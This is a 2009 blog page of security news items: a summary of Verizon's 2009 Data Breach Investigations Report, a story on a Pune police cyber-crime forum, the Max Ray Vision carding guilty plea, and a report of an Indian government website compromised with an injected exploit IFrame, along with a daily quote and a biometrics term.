Saturday, July 4, 2009

Quote of the day

Quote of the day

Yesterday is a canceled check: Forget it. Tomorrow is a promissory note: Don't count on it. Today is ready cash: Use it!

Edwin C. Bliss


New IT Term of the day

New IT Term of the day

Covert environment

In biometrics terminology, covert or covert environment refers to a biometric sample collection location where individuals in the location are not aware that the sample is being taken. One common covert environment is airport checkpoint security where cameras capture images of travelers that are compared to images on a security watch-list. The image capture and comparison is performed without the traveler's knowledge.

RECORD : 90 data breaches in 2008

RECORD : 90 data breaches in 2008

By Linda Musthaler,

Network World,

June 26, 2009


Data breaches continue to plague organizations in virtually every industry. In some breaches, the root cause is fairly obvious -- a lost or stolen laptop or USB stick, for instance. In other cases, it takes a forensic investigation to piece together the details of what happened and how.

The Verizon Business RISK Team is a world-renowned data forensics organization that investigates all sorts of suspected breaches. Since 2004, this team has worked on more than 600 cases. Fortunately for us, the team is willing to share its collective knowledge and provide an analysis of the trends in breaches, including how they happen and what the root causes and contributing factors are.

10 woeful takes of data gone missing

I featured some of their analysis in my February article, "Don't Be a Data Loss Victim". Since then, the RISK Team has published its latest report, the 2009 Data Breach Investigations Report (DBIR). This is a good read for any organization that is trying to plan where and how to allocate scarce resources. For example, the prevailing wisdom says that company insiders are a major threat for accidentally exposing data or intentionally stealing it. In the experience of the Verizon team -- and mind you, the team's universe is not all breaches, but only the ones its members investigate -- the insider threat is much less significant than those threats that come from outside the company. Knowing this, an organization can plan its defenses accordingly.

The 2009 report focuses on the more than 90 confirmed breaches the team investigated in 2008. The number of sensitive data records exposed through these breaches totals more than 285 million. That's more records exposed in one year than the sum of all the records exposed in the four previous years.

Here are some notable statistics from the 2009 report:

  • 74% of the breaches resulted from external sources. This percentage is just about unchanged from previous years.

  • 91% of all compromised records were linked to organized criminal groups. It's no surprise such groups are after data they can monetize quickly, such as credit card data and financial records.

  • 67% of the breaches were aided by significant errors, such as not applying a patch for a known vulnerability. This statistic is unchanged since previous years, meaning we haven't learned yet how important it is to watch out for the simple things that are in our control.

  • 38% of the 2008 attacks utilized malware to plant the means to steal data. This is trending upward as malware is now an essential component to nearly all large-scale breaches. As the report says, "Hacking gets the criminal in the door, but malware gets him the data."

Network managers can take solace in one bit of information from Verizon's report: a small percentage of 2008 hacks targeted routers, switches and other network devices. What's more, wireless networks are actually a rare attack vector for recent data breaches. (Perhaps network managers learned from the atrocious TJX Companies breach in 2007 in which 94 million accounts were compromised. Hackers utilized outdated wireless network security in retail stores to gain access to unencrypted payment card data.)

Another interesting take-away is the analysis of what types of information assets are often compromised. In the scope of the Verizon investigations, 94% of the breaches (and 99.9% of the pilfered records) are attributed to online assets, including servers and applications. This is significant because many companies fret about data on user systems, in offline storage and in transit across networks and devices. Verizon reports that 17% of the breaches involving only .01% of the data occurred with user systems; 2% of the breaches impacting .04% of the data involved offline data; and no breaches occurred with networks and devices. Bottom line: focus on protecting data on servers and applications.

Understandably, no organization has unlimited resources for data protection, and therefore risk mitigation efforts must be focused. Based on the observations made over five years and across 600 investigations, the Verizon Business RISK Team provides five recommendations for major activities that can greatly help reduce the risk of a data breach:

  • Ensure that essential controls are met.

  • Find, track and assess data.

  • Collect and monitor event logs.

  • Audit user accounts and credentials.

  • Test and review Web applications.

You can read the entire 2009 Data Breach Investigations Report at http://www.verizonbusiness.com/resources/security/reports/2009_databreach_rp.pdf.

GROWTH : Cyber crime cases rise 230 times in 5 years in Pune

GROWTH : Cyber crime cases rise 230 times in 5 years in Pune

01 July 2009



The number of people coming forward with cyber crime complaints is on a significant rise. “In a year after the cyber cell of Pune police was started in July 2003 we had received only nine complaints of cyber crime. There is a manifold rise as in the year 2008, we have received 2007 cyber crime complaints,” said Deputy Commissioner of Police (cyber cell) Rajendra Dahale, during the opening ceremony of ‘Cop Tech”‘forum at Pune police commissionerate on Tuesday.

The “Cop Tech” forum is an initiative of Pune police, NASSCOM and Data Security Council of India (DSCI) to increase sharing of ideas and knowledge on cyber security, for making Pune a cyber safe city. Making a mention of the cyber crime cases like derogatory content about Chattrapati Shivaji Maharaj on orkut and film star Amol Palekar’s credit card case, Dahale said that, “Pune police is doing good in tackling cyber crimes. We have trained many policemen at the cyber lab at Shivajinagar police headquarters. Through “Cop Tech” forum, we expect the IT industry and Pune police will share more knowledge and ideas on cyber safety. Members of ‘Cop Tech’ forum and police would be holding quarterly meeting for the purpose.”

Police commissioner Satyapal Singh then signed a memorandum of understanding (MoU) with NASSCOM, while launching the “Cop Tech” forum.

Pratap Reddy, an IPS officer who an advisor (cyber security) to NASSCOM said that this was the first MoU of its kind in the country. “Partnership between the police and industry is appreciated,” Reddy said. While Singh said that police would like to learn fast and more from on cyber security through the “Cop Tech” forum. Singh suggested that meetings of ‘Cop Tech’ forum members and police should be held every month. “Making the society cyber safe is a challenge. We would like to learn more on cyber safety. There is no time to waste,” Singh said. Rajiv Vaishnav, vice president of NASSCOM and Anand Deshpande, founder and managing director of Persistent Systems Ltd also spoke.

GUILTY : 'Hacker's hacker' from San Francisco pleads guilty in $86 million fraud

GUILTY : 'Hacker's hacker' from San Francisco pleads guilty in $86 million fraud


June 30, 2009


A mild-mannered computer geek people once believed could do no wrong admitted Monday to stealing nearly 2 million credit card numbers, which he and others used to rack up more than $86 million in fraudulent charges.

Max Ray Vision, 36, of San Francisco pleaded guilty in U.S. District Court, Downtown, to two counts of wire fraud. He faces up to 60 years in prison when sentenced Oct. 20 by Senior U.S. District Judge Maurice Cohill.

"Max is kind of a hacker's hacker," said federal public defender Michael Novara, explaining that his client -- known by the Internet aliases "Iceman," "Aphex," "Darkest" and "Digits" -- hacked into computer systems not only of financial institutions and credit-card processing centers but also those of other hackers, to steal information they stole.

"He would do that for various reasons, but basically because he could," Novara said.

Vision changed his name from Max Ray Butler shortly before the Secret Service arrested him in September 2007 at his Bay Area safehouse. Inside, agents found computer equipment storing approximately five terabytes of encrypted data and 1.8 million stolen credit card accounts.

Visa, Mastercard, American Express and Discover lost about $86.4 million through charges on those accounts, Assistant U.S. Attorney Luke Dembosky said.

"These losses were borne by the thousands of banks that issued the cards in question," Dembosky said.

In the 1990s, Vision owned a consulting company that helped companies identify weaknesses in computer systems through "network intrusion detection."

Federal prosecutors in Northern California charged Vision in 2000 with computer crimes for hacking into Pentagon computer systems. He was sentenced to 18 months in prison. Court proceedings revealed that Vision worked as an FBI informant for years before his arrest.

"He's definitely the most interesting hacker case I've seen in over a decade," said Kevin Poulsen, a senior editor for Wired Magazine who attended yesterday's hearing and is writing a book about Vision. "It's pretty unusual for someone to be a good computer-security professional and a good computer criminal."

In 1994, Poulsen went to prison for hacking into a radio station and setting up a contest-rigging scheme. His 51-month prison sentence at the time was the longest ever for a hacking crime.

"I've been a hacker, I've known hackers, and I've written about hackers for a long time," Poulsen said. "(Vision) is definitely the most interesting story I've ever heard."

From 2005 until 2007, Vision and a partner in Los Angeles, Christopher Aragon, established CardersMarket.com as a way to acquire, sell and use stolen credit card and other identity-related information, a practice known as "carding," Dembosky said. The Web site at its peak had approximately 4,500 members worldwide.

It was one of five English-language sites at the time that facilitated computer crimes, Poulsen said. He said Vision hacked into the other four and took them over.

Two Secret Service informants helped bring down Vision's hacking empire, Dembosky said. One gained access to CardersMarket hierarchy after earning Vision's trust. The other purchased 103 stolen credit card numbers and related information. Under the sealed plea deal, three identity theft charges will be dropped.

Federal charges were filed against Vision in Virginia at the same time he was indicted in Pittsburgh, court records show.

Vision disagreed with some details the prosecutor outlined during yesterday's hearing, but agreed he did most of the actions alleged.

"This is me and what I did, in essence," Vision said.

Before his first arrest, people in the computer-security industry believed Vision was one of the good guys, or a white hat. Dragos Ruiu, owner of DragosTech.com in Edmonton, Canada, was a professional acquaintance of Vision.

"He was a real Dr. Jekyll-Mr. Hyde type," Ruiu said. "He was innocuous, and nobody would have pegged him for an underworld mob king."

This ranks as one of the all-time biggest computer hacking jobs, Ruiu said.

"He was really good at attacks," Ruiu said. "Now we know why."

HACKED : Indian Institute of Remote Sensing Website Hacked

HACKED : Indian Institute of Remote Sensing Website Hacked

Malicious exploit-loading JavaScript code injected in its pages

By Lucian Constantin, Web News Editor

30 June 2009


Security researchers from web security vendor Finjan report that the website of India's Institute of Remote Sensing has been compromised by hackers. An injected IFrame loads exploits from the LuckySploit attack toolkit against visitors.

"Last week, we detected that another website from the Government of India 'iirs-nrsa.gov.in' was compromised by cybercriminals who use it as a malicious code distribution channel," the Finjan malware analysts announce.

The pages of the website have been infected with obfuscated JavaScript that inserts a rogue IFrame. The IFrame is subsequently used to load malicious code from a third-party server and attempts to exploit the website's visitors. "The IFrame created by this script points to malicious content hosted on server in Texas armed with the LuckySploit attack toolkit," the researchers explain.

LuckySploit uses a collection of exploits for vulnerabilities in the operating system, browsers or other popular software such as Adobe Flash and Adobe Reader. After obtaining access to the server, the analysts looked at the referrer statistics from the LuckySploit administration panel. According to these, iirs-nrsa.gov.in had 500 hits from 157 unique users since it was compromised. Despite these relatively low numbers, the successful infection rate is pretty high, situated at 17,8% (28 users).

What's even more worrying is the total number of successful infections (11,798) on all the websites compromised by this group of hackers. The Finjan security researchers warn that, "The exploit page was detected by only 4 out of 40 AV engines at Virus Total."

Last month, the security vendor reported a similar infection, using the Fiesta attack toolkit, on another Indian government website, belonging to the Union Public Service Commission. "We notified CERT India about this issue; trusting that the problem will be fixed soon," the company noted, regarding this latest incident.

Back in January, we reported that the website belonging to the Indian Embassy in Spain had been compromised in a similar way, while later, in February, India's Ministry of External Affairs was confronted with a serious security breach after spyware was found on its network.

This Day in History

Thanks for your Visit